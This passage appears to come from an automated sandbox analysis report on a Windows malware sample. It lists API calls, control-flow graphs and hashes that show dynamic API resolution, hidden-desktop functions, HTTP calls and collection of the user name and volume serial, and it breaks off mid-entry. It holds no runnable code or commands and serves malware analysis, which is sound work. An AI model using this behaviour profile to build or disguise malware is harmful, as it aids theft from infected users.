                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: 19a15119ab5a4a53812b3a8f5a5b230c09c3ee033d9509008de8dea9c0a11fa3
                            • Instruction ID: 267d92a64bd5da350a969013c86aca7ce67ccae4e95f7ae52cdae3f32d8d16a0
                            • Opcode Fuzzy Hash: 19a15119ab5a4a53812b3a8f5a5b230c09c3ee033d9509008de8dea9c0a11fa3
                            • Instruction Fuzzy Hash: CF817B71E1521AAFEB20DFA4DC49BEE77BAAF44700F044129FA45E7381DB70AD048B94

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 6d4a60-6d4afc RtlAllocateHeap 2867 6d4afe-6d4b03 2850->2867 2868 6d4b7a-6d4bbe VirtualProtect 2850->2868 2869 6d4b06-6d4b78 2867->2869 2869->2868
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D4AA3
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 006D4BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: ac6fb27d99b9ad40f1cb00ba540f6c70bdf4894c97026025a98634a84b0c54d5
                            • Instruction ID: 99071377291c7c47926191f941b933e5d214bff9acd23a68ab6d639dac596b87
                            • Opcode Fuzzy Hash: ac6fb27d99b9ad40f1cb00ba540f6c70bdf4894c97026025a98634a84b0c54d5
                            • Instruction Fuzzy Hash: 1731E7D8FA821CB6D620FBEF4C47B5F6ED5DF85758B0142627608571C0C9A57500CAAA
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006F2A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 006F2A8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 16742e6a8f0fb0b7d2b5dcd586c239ec6f569482eaecd69758bb2769a6aa567f
                            • Instruction ID: 78d39600bd9c8773f1e7a0d1ac41355b4d98fc667b933ad35f284c4cecf1d545
                            • Opcode Fuzzy Hash: 16742e6a8f0fb0b7d2b5dcd586c239ec6f569482eaecd69758bb2769a6aa567f
                            • Instruction Fuzzy Hash: 3EF0B4B2A44608AFC700DF98DD49B9FBBBCF709B21F000216FA15E3680D7B4190486E1

                            Control-flow Graph (rendered as an image in the original report; legend: Executed / Not Executed)
                            • Entry block 6f66e0-6f66e7 leads, directly or via 6f66ed-6f6af9 (GetProcAddress * 43), to 6f6afe-6f6b92 (LoadLibraryA * 8); the remaining blocks up to 6f71d3 each resolve a further batch of GetProcAddress calls (5, 8, 5, 6, 12, 5, 2, 2, 10, 4, 1, 4) before falling through to the end of the function.
                            APIs
                            • GetProcAddress.KERNEL32(76210000,01005088), ref: 006F66F5
                            • GetProcAddress.KERNEL32(76210000,010052A8), ref: 006F670D
                            • GetProcAddress.KERNEL32(76210000,01019070), ref: 006F6726
                            • GetProcAddress.KERNEL32(76210000,01018FF8), ref: 006F673E
                            • GetProcAddress.KERNEL32(76210000,01019010), ref: 006F6756
                            • GetProcAddress.KERNEL32(76210000,0101DF00), ref: 006F676F
                            • GetProcAddress.KERNEL32(76210000,0100A7E8), ref: 006F6787
                            • GetProcAddress.KERNEL32(76210000,0101DF18), ref: 006F679F
                            • GetProcAddress.KERNEL32(76210000,0101DEE8), ref: 006F67B8
                            • GetProcAddress.KERNEL32(76210000,0101E080), ref: 006F67D0
                            • GetProcAddress.KERNEL32(76210000,0101DFA8), ref: 006F67E8
                            • GetProcAddress.KERNEL32(76210000,01004F68), ref: 006F6801
                            • GetProcAddress.KERNEL32(76210000,01005168), ref: 006F6819
                            • GetProcAddress.KERNEL32(76210000,010052E8), ref: 006F6831
                            • GetProcAddress.KERNEL32(76210000,01005328), ref: 006F684A
                            • GetProcAddress.KERNEL32(76210000,0101E020), ref: 006F6862
                            • GetProcAddress.KERNEL32(76210000,0101DED0), ref: 006F687A
                            • GetProcAddress.KERNEL32(76210000,0100A6A8), ref: 006F6893
                            • GetProcAddress.KERNEL32(76210000,01005268), ref: 006F68AB
                            • GetProcAddress.KERNEL32(76210000,0101E068), ref: 006F68C3
                            • GetProcAddress.KERNEL32(76210000,0101DF30), ref: 006F68DC
                            • GetProcAddress.KERNEL32(76210000,0101DF78), ref: 006F68F4
                            • GetProcAddress.KERNEL32(76210000,0101DFC0), ref: 006F690C
                            • GetProcAddress.KERNEL32(76210000,01005188), ref: 006F6925
                            • GetProcAddress.KERNEL32(76210000,0101DF48), ref: 006F693D
                            • GetProcAddress.KERNEL32(76210000,0101DF60), ref: 006F6955
                            • GetProcAddress.KERNEL32(76210000,0101DF90), ref: 006F696E
                            • GetProcAddress.KERNEL32(76210000,0101DFD8), ref: 006F6986
                            • GetProcAddress.KERNEL32(76210000,0101DFF0), ref: 006F699E
                            • GetProcAddress.KERNEL32(76210000,0101E008), ref: 006F69B7
                            • GetProcAddress.KERNEL32(76210000,0101E038), ref: 006F69CF
                            • GetProcAddress.KERNEL32(76210000,0101E050), ref: 006F69E7
                            • GetProcAddress.KERNEL32(76210000,0101D930), ref: 006F6A00
                            • GetProcAddress.KERNEL32(76210000,0100FD78), ref: 006F6A18
                            • GetProcAddress.KERNEL32(76210000,0101D9D8), ref: 006F6A30
                            • GetProcAddress.KERNEL32(76210000,0101DA20), ref: 006F6A49
                            • GetProcAddress.KERNEL32(76210000,01004F88), ref: 006F6A61
                            • GetProcAddress.KERNEL32(76210000,0101D9C0), ref: 006F6A79
                            • GetProcAddress.KERNEL32(76210000,010051E8), ref: 006F6A92
                            • GetProcAddress.KERNEL32(76210000,0101D9F0), ref: 006F6AAA
                            • GetProcAddress.KERNEL32(76210000,0101DB70), ref: 006F6AC2
                            • GetProcAddress.KERNEL32(76210000,01004FA8), ref: 006F6ADB
                            • GetProcAddress.KERNEL32(76210000,010050A8), ref: 006F6AF3
                            • LoadLibraryA.KERNEL32(0101DAE0,006F051F), ref: 006F6B05
                            • LoadLibraryA.KERNEL32(0101DB28), ref: 006F6B16
                            • LoadLibraryA.KERNEL32(0101DA08), ref: 006F6B28
                            • LoadLibraryA.KERNEL32(0101DB88), ref: 006F6B3A
                            • LoadLibraryA.KERNEL32(0101D990), ref: 006F6B4B
                            • LoadLibraryA.KERNEL32(0101DA98), ref: 006F6B5D
                            • LoadLibraryA.KERNEL32(0101D9A8), ref: 006F6B6F
                            • LoadLibraryA.KERNEL32(0101DA38), ref: 006F6B80
                            • GetProcAddress.KERNEL32(751E0000,01005028), ref: 006F6B9C
                            • GetProcAddress.KERNEL32(751E0000,0101DA50), ref: 006F6BB4
                            • GetProcAddress.KERNEL32(751E0000,01018C08), ref: 006F6BCD
                            • GetProcAddress.KERNEL32(751E0000,0101DBA0), ref: 006F6BE5
                            • GetProcAddress.KERNEL32(751E0000,01005108), ref: 006F6BFD
                            • GetProcAddress.KERNEL32(701C0000,0100A6D0), ref: 006F6C1D
                            • GetProcAddress.KERNEL32(701C0000,010056C8), ref: 006F6C35
                            • GetProcAddress.KERNEL32(701C0000,0100A810), ref: 006F6C4E
                            • GetProcAddress.KERNEL32(701C0000,0101D948), ref: 006F6C66
                            • GetProcAddress.KERNEL32(701C0000,0101D8E8), ref: 006F6C7E
                            • GetProcAddress.KERNEL32(701C0000,01005468), ref: 006F6C97
                            • GetProcAddress.KERNEL32(701C0000,010053C8), ref: 006F6CAF
                            • GetProcAddress.KERNEL32(701C0000,0101D918), ref: 006F6CC7
                            • GetProcAddress.KERNEL32(753A0000,01005428), ref: 006F6CE3
                            • GetProcAddress.KERNEL32(753A0000,01005688), ref: 006F6CFB
                            • GetProcAddress.KERNEL32(753A0000,0101DA68), ref: 006F6D14
                            • GetProcAddress.KERNEL32(753A0000,0101DA80), ref: 006F6D2C
                            • GetProcAddress.KERNEL32(753A0000,010055C8), ref: 006F6D44
                            • GetProcAddress.KERNEL32(76310000,0100A928), ref: 006F6D64
                            • GetProcAddress.KERNEL32(76310000,0100A450), ref: 006F6D7C
                            • GetProcAddress.KERNEL32(76310000,0101DAF8), ref: 006F6D95
                            • GetProcAddress.KERNEL32(76310000,01005608), ref: 006F6DAD
                            • GetProcAddress.KERNEL32(76310000,01005488), ref: 006F6DC5
                            • GetProcAddress.KERNEL32(76310000,0100A7C0), ref: 006F6DDE
                            • GetProcAddress.KERNEL32(76910000,0101DB10), ref: 006F6DFE
                            • GetProcAddress.KERNEL32(76910000,01005448), ref: 006F6E16
                            • GetProcAddress.KERNEL32(76910000,01018AA8), ref: 006F6E2F
                            • GetProcAddress.KERNEL32(76910000,0101D960), ref: 006F6E47
                            • GetProcAddress.KERNEL32(76910000,0101D900), ref: 006F6E5F
                            • GetProcAddress.KERNEL32(76910000,01005628), ref: 006F6E78
                            • GetProcAddress.KERNEL32(76910000,01005348), ref: 006F6E90
                            • GetProcAddress.KERNEL32(76910000,0101DAB0), ref: 006F6EA8
                            • GetProcAddress.KERNEL32(76910000,0101DB40), ref: 006F6EC1
                            • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 006F6ED7
                            • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 006F6EEE
                            • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 006F6F05
                            • GetProcAddress.KERNEL32(75B30000,01005508), ref: 006F6F21
                            • GetProcAddress.KERNEL32(75B30000,0101DAC8), ref: 006F6F39
                            • GetProcAddress.KERNEL32(75B30000,0101DB58), ref: 006F6F52
                            • GetProcAddress.KERNEL32(75B30000,0101DBB8), ref: 006F6F6A
                            • GetProcAddress.KERNEL32(75B30000,0101D978), ref: 006F6F82
                            • GetProcAddress.KERNEL32(75670000,01005648), ref: 006F6F9E
                            • GetProcAddress.KERNEL32(75670000,010053E8), ref: 006F6FB6
                            • GetProcAddress.KERNEL32(76AC0000,010056A8), ref: 006F6FD2
                            • GetProcAddress.KERNEL32(76AC0000,0101D8D0), ref: 006F6FEA
                            • GetProcAddress.KERNEL32(6F4E0000,010055E8), ref: 006F700A
                            • GetProcAddress.KERNEL32(6F4E0000,010056E8), ref: 006F7022
                            • GetProcAddress.KERNEL32(6F4E0000,01005408), ref: 006F703B
                            • GetProcAddress.KERNEL32(6F4E0000,0101DD50), ref: 006F7053
                            • GetProcAddress.KERNEL32(6F4E0000,01005668), ref: 006F706B
                            • GetProcAddress.KERNEL32(6F4E0000,01005368), ref: 006F7084
                            • GetProcAddress.KERNEL32(6F4E0000,010054A8), ref: 006F709C
                            • GetProcAddress.KERNEL32(6F4E0000,010054C8), ref: 006F70B4
                            • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 006F70CB
                            • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 006F70E2
                            • GetProcAddress.KERNEL32(75AE0000,0101DC00), ref: 006F70FE
                            • GetProcAddress.KERNEL32(75AE0000,01018AC8), ref: 006F7116
                            • GetProcAddress.KERNEL32(75AE0000,0101DBE8), ref: 006F712F
                            • GetProcAddress.KERNEL32(75AE0000,0101DDB0), ref: 006F7147
                            • GetProcAddress.KERNEL32(76300000,01005388), ref: 006F7163
                            • GetProcAddress.KERNEL32(6D3D0000,0101DC78), ref: 006F717F
                            • GetProcAddress.KERNEL32(6D3D0000,010053A8), ref: 006F7197
                            • GetProcAddress.KERNEL32(6D3D0000,0101DD38), ref: 006F71B0
                            • GetProcAddress.KERNEL32(6D3D0000,0101DEA0), ref: 006F71C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 6ce9c791d120a0a8e381e02fe90690436c9f7d13018c75d30d360691edd72a71
                            • Instruction ID: b08a321fde691686ff4f6701d0f1767cbee50e7ab011b8e5b5cfddbf919b7b93
                            • Opcode Fuzzy Hash: 6ce9c791d120a0a8e381e02fe90690436c9f7d13018c75d30d360691edd72a71
                            • Instruction Fuzzy Hash: B2625EB563C201EFD754DF64EC88A2737BAF7897453108919EA96C3362DB74A840FB60
                            APIs
                            • lstrlen.KERNEL32(006FCFEC), ref: 006EF1D5
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF1F1
                            • lstrlen.KERNEL32(006FCFEC), ref: 006EF1FC
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF215
                            • lstrlen.KERNEL32(006FCFEC), ref: 006EF220
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF239
                            • lstrcpy.KERNEL32(00000000,00704FA0), ref: 006EF25E
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF28C
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF2C0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EF2F0
                            • lstrlen.KERNEL32(01005148), ref: 006EF315
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 9cb9364c8e1ece1e604a5a7bb9a8c3d1825251d9ce8af2af8f99752aa51e1f43
                            • Instruction ID: ea6c2f371e703fd763c92ebfa0777383d0b158bd90461d6f50c99ee88b393965
                            • Opcode Fuzzy Hash: 9cb9364c8e1ece1e604a5a7bb9a8c3d1825251d9ce8af2af8f99752aa51e1f43
                            • Instruction Fuzzy Hash: 70A27070A16346DFCB60DF66D958A9AB7F6AF44310F18807AE849DB362DB31DC42CB50
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0013
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F00BD
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F00E1
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F00EC
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0110
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F011B
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F013F
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F015A
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0189
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F0194
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F01C3
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F01CE
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0206
                            • lstrlen.KERNEL32(006FCFEC), ref: 006F0250
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F0288
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F059B
                            • lstrlen.KERNEL32(01005008), ref: 006F05AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F05D7
                            • lstrcat.KERNEL32(00000000,?), ref: 006F05E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F060E
                            • lstrlen.KERNEL32(0101F508), ref: 006F0625
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F064C
                            • lstrcat.KERNEL32(00000000,?), ref: 006F0658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F0681
                            • lstrlen.KERNEL32(01005068), ref: 006F0698
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F06C9
                            • lstrcat.KERNEL32(00000000,?), ref: 006F06D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F0706
                            • lstrcpy.KERNEL32(00000000,01018AD8), ref: 006F074B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F077F
                            • lstrcpy.KERNEL32(00000000,0101F5C8), ref: 006F07E7
                            • lstrcpy.KERNEL32(00000000,010189E8), ref: 006F0858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 006F08CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F0928
                            • lstrcpy.KERNEL32(00000000,010188F8), ref: 006F09F8
                              • Part of subcall function 006D24E0: lstrcpy.KERNEL32(00000000,?), ref: 006D2528
                              • Part of subcall function 006D24E0: lstrcpy.KERNEL32(00000000,?), ref: 006D254E
                              • Part of subcall function 006D24E0: lstrcpy.KERNEL32(00000000,?), ref: 006D2577
                            • lstrcpy.KERNEL32(00000000,01018A28), ref: 006F0ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F0B81
                            • lstrcpy.KERNEL32(00000000,01018A28), ref: 006F0D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: c11abbbc1b40d87df4d2d982a57833049faca8943e9867a9b37750cb25acea97
                            • Instruction ID: a309b390eda2cb7e23f2ec7e1de3ea1ca6c6a3ac86d8ce63602e647680169f7d
                            • Opcode Fuzzy Hash: c11abbbc1b40d87df4d2d982a57833049faca8943e9867a9b37750cb25acea97
                            • Instruction Fuzzy Hash: 80E26B70A05345CFD774DF29C488BAAB7E2BF89314F58856EE58D8B362DB319841CB42
                            APIs
                            • lstrlen.KERNEL32(01005148), ref: 006EF315
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF47B
                            • lstrcpy.KERNEL32(00000000,01005148), ref: 006EF4BB
                            • lstrcpy.KERNEL32(00000000,01018BD8), ref: 006EF4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006EF61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 006EF718
                            • lstrlen.KERNEL32(01018BC8), ref: 006EF746
                            • lstrcpy.KERNEL32(00000000,01018BC8), ref: 006EF771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EF793
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 006EFA32
                            • lstrlen.KERNEL32(01018BF8), ref: 006EFA60
                            • lstrcpy.KERNEL32(00000000,01018BF8), ref: 006EFA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EFAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EFAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 25c10eeacb573844a90a598578981a169f9445ff27901d82aa202c75ef9de778
                            • Instruction ID: fc7e1b149ad231c6474d61d897ab799785a5111e4a5e15dc9f024671e5924242
                            • Opcode Fuzzy Hash: 25c10eeacb573844a90a598578981a169f9445ff27901d82aa202c75ef9de778
                            • Instruction Fuzzy Hash: 3BF12F70A16342CFDB64CF6AD894A96B7F6BF44314B1981BED4099B3A2E731DC42CB50

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2721 6e8ca0-6e8cc4 StrCmpCA -> 2722, 2723
                            • 2722 6e8ccd-6e8ce6 -> 2725, 2726
                            • 2723 6e8cc6-6e8cc7 ExitProcess
                            • 2725 6e8cec-6e8cf1 -> 2727
                            • 2726 6e8ee2-6e8eef call 6d2a20
                            • 2727 6e8cf6-6e8cf9 -> 2729, 2730
                            • 2729 6e8cff -> 2732, 2733, 2734, 2735, 2736, 2737, 2738, 2739, 2740, 2741, 2742, 2743, 2744
                            • 2730 6e8ec3-6e8edc -> 2726, 2766
                            • 2732 6e8e6f-6e8e7d StrCmpCA -> 2730, 2757
                            • 2733 6e8e88-6e8e9a lstrlen -> 2758, 2759
                            • 2734 6e8d06-6e8d15 lstrlen -> 2753, 2754
                            • 2735 6e8d84-6e8d92 StrCmpCA -> 2730, 2748
                            • 2736 6e8da4-6e8db8 StrCmpCA -> 2730
                            • 2737 6e8dbd-6e8dcb StrCmpCA -> 2730, 2749
                            • 2738 6e8ddd-6e8deb StrCmpCA -> 2730, 2750
                            • 2739 6e8dfd-6e8e0b StrCmpCA -> 2730, 2751
                            • 2740 6e8e1d-6e8e2b StrCmpCA -> 2730, 2752
                            • 2741 6e8e3d-6e8e4b StrCmpCA -> 2730, 2755
                            • 2742 6e8d5a-6e8d69 lstrlen -> 2745, 2746
                            • 2743 6e8e56-6e8e64 StrCmpCA -> 2730, 2756
                            • 2744 6e8d30-6e8d3f lstrlen -> 2760, 2761
                            • 2745 6e8d6b-6e8d70 call 6d2a20 -> 2746
                            • 2746 6e8d73-6e8d7f call 6d2930 -> 2779
                            • 2748 6e8d98-6e8d9f -> 2730
                            • 2749 6e8dd1-6e8dd8 -> 2730
                            • 2750 6e8df1-6e8df8 -> 2730
                            • 2751 6e8e11-6e8e18 -> 2730
                            • 2752 6e8e31-6e8e38 -> 2730
                            • 2753 6e8d1f-6e8d2b call 6d2930 -> 2779
                            • 2754 6e8d17-6e8d1c call 6d2a20 -> 2753
                            • 2755 6e8e4d-6e8e54 -> 2730
                            • 2756 6e8e66-6e8e6d -> 2730
                            • 2757 6e8e7f-6e8e86 -> 2730
                            • 2758 6e8e9c-6e8ea1 call 6d2a20 -> 2759
                            • 2759 6e8ea4-6e8eb0 call 6d2930 -> 2779
                            • 2760 6e8d49-6e8d55 call 6d2930 -> 2779
                            • 2761 6e8d41-6e8d46 call 6d2a20 -> 2760
                            • 2766 6e8cf3 -> 2727
                            • 2779 6e8eb3-6e8eb5 -> 2730, 2780
                            • 2780 6e8eb7-6e8eb9 -> 2730, 2781
                            • 2781 6e8ebb-6e8ebd lstrcpy -> 2730
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 55455e64aa2324fc5429161f9c2a7861b8b25638e3cd1202f7306cf910321602
                            • Instruction ID: 22965c71b78ff1298bf707ee59d7e2e0826366e84bf966c9ffb4ff622a84263b
                            • Opcode Fuzzy Hash: 55455e64aa2324fc5429161f9c2a7861b8b25638e3cd1202f7306cf910321602
                            • Instruction Fuzzy Hash: 4051BFB0A09782EFD720DF76DC84A6B7BF6BF14700B10081DE58AD7662DB78D4429B20

                            Control-flow Graph (one basic block per line: node id, address range, API calls; successor nodes after ->)
                            • 2782 6f2740-6f2783 GetWindowsDirectoryA -> 2783, 2784
                            • 2783 6f278c-6f27ea GetVolumeInformationA -> 2785
                            • 2784 6f2785 -> 2783
                            • 2785 6f27ec-6f27f2 -> 2786, 2787
                            • 2786 6f2809-6f2820 GetProcessHeap RtlAllocateHeap -> 2788, 2789
                            • 2787 6f27f4-6f2807 -> 2785
                            • 2788 6f2826-6f2844 wsprintfA -> 2790
                            • 2789 6f2822-6f2824 -> 2790
                            • 2790 6f285b-6f2872 call 6f71e0
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 006F277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006E93B6,00000000,00000000,00000000,00000000), ref: 006F27AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006F280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F2816
                            • wsprintfA.USER32 ref: 006F283B
                            Strings
                            Memory Dump Source
